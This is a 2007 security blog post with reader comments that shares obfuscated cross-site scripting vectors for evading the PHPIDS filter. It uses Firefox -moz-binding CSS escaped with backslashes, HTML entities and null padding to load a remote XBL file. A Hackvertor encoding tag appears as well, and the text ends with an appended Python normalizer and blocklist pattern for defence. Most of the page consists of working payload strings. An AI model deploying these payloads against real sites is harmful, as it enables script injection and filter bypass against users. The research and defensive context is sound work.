Awesome XSS
Saturday, 24 November 2007
Hacking the PHPIDS again I found some cool XSS:-
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business
\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
I’ve moved it onto two lines for correct display.
Who’d have thought that Firefox would allow all that within the URL and CSS properties :)
No. 1 — November 24th, 2007 at 7:40 pm
awezome gareth!! :)
anyway, I thought .mario disabled the \char thing a while ago.. or maybe it was just the \a and \l :)
Greetz!
No. 2 — November 25th, 2007 at 1:07 am
hehe thanks, you next? :)
No. 3 — November 25th, 2007 at 1:17 am
Check these out too :)
<div/style=\-\mo\z\-&
#98\i\nd\in\g:&
#92url(//busi&
#110ess\i\nfo.&
#99o.uk\/labs
\/xbl\/xbl\
.xml\#xss)&>
<div style=-moz-bind&
#x69ng:url(//bu&
#x73inessinfo.&
#x63o.uk/labs/&
#x78bl/xbl.xml
#xss)>
No. 4 — November 25th, 2007 at 1:37 am
<div    style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
<Q%^&*(£@!'” style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
No. 5 — November 25th, 2007 at 11:10 am
A tool to automate your XSS hacking/testing attempts based on the ha.ckers.org XSS attacks XML. If it's getting easier to test for XSS vulnerabilities, then it's getting easier to exploit those vulnerabilities.
No. 6 — November 25th, 2007 at 10:01 pm
Gareth you bandit :) Hacking the PHPIDS while I visit my gram's place *g*
Well done and of course fixed by now!
Thanks and Greetings,
.mario
No. 7 — November 26th, 2007 at 1:12 am
Hehe a hacker always attacks at the most inconvenient time :)
No. 8 — November 26th, 2007 at 1:32 am
Believe it or not this is also a working mozbinding lol :-
<x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>
No. 9 — November 26th, 2007 at 1:48 am
<x/style=-\m\000000o\000000z\000000-b\000000i\000000nd\000000i\000000n\000000g\000000:\000000u\000000r\000000l\000000(\000000/\000000/b\000000u\000000s\000000i\000000ne\000000s\000000s\000000i\000000nf\000000o\000000.c\000000o\000000.\000000u\000000k\000000/\000000la\000000b\000000s\000000/\000000x\000000b\000000l\000000/\000000x\000000b\000000l\000000.\000000x\000000m\000000l\000000#\000000x\000000s\000000s\000000)>
No. 10 — November 26th, 2007 at 8:36 am
Eew… that’s indeed incredible! We need those for the xssDB!
No. 11 — November 26th, 2007 at 12:42 pm
I’ve added this functionality to Hackvertor as a tag (backslashesc) under filter evasion:-
<div/style=<@backslashesc>-moz-binding<@/backslashesc>:<@backslashesc>url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)<@/backslashesc>>
Much easier than having to remember which characters can be escaped :)
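For the filter side of this thread, here is an added example (not from the original post, its comments, or PHPIDS) of normalizing a style value before matching: decode HTML character references, then CSS backslash escapes, then drop NUL padding. The one-entry blocklist, the function names and the `example.test` samples are assumptions made for the illustration, as is the choice to treat control characters as ignorable.

```python
import html
import re

# A CSS escape is a backslash followed by 1-6 hex digits (plus one optional
# whitespace character), or by any other character, which stands for itself.
CSS_ESCAPE = re.compile(r"\\(?:([0-9a-fA-F]{1,6})[ \t\r\n\f]?|(.))")
# Assumption: a lenient parser ignores NUL and other control characters.
IGNORABLE = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f\ufffd]")
# Hypothetical one-entry blocklist; a real rule set would carry more.
BLOCKED = re.compile(r"-moz-binding\s*:")


def _decode(match):
    hex_digits, literal = match.groups()
    if literal is not None:
        return literal                     # \m -> m, \- -> -, \/ -> /
    code = int(hex_digits, 16)
    if code > 0x10FFFF or 0xD800 <= code <= 0xDFFF:
        return "\ufffd"                    # not a valid scalar value
    return chr(code)                       # \62 -> b, \0 -> NUL


def normalize_style(raw):
    """Canonical form of a style attribute value, for matching only."""
    text = html.unescape(raw)              # HTML layer: &#98; &#x69; &#92;
    text = CSS_ESCAPE.sub(_decode, text)   # CSS layer: backslash escapes
    text = IGNORABLE.sub("", text)         # drop NUL padding
    return text.lower()


def is_blocked(raw):
    return bool(BLOCKED.search(normalize_style(raw)))


# Constructed samples (example.test is a placeholder host).
SAMPLES = [
    r"\-\mo\z\-b\i\nd\in\g:\url(//example.test/x.xml#x)",
    r"-m\0o\0z\0-b\0i\0nd\0i\0n\0g:url(//example.test/x.xml#x)",
    r"-\m\000000o\000000z\000000-b\000000i\000000nding:url(//example.test/x.xml#x)",
    "-moz-bind&#x69;ng:&#92;url(//example.test/x.xml#x)",
    "color:red;background:url(/img/a.png)",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(is_blocked(s), normalize_style(s))
```

A backslash before a hex letter starts a numeric escape rather than standing for the letter itself (`\b` is U+000B, not `b`), which is why the decoder has to follow the CSS grammar instead of just stripping backslashes.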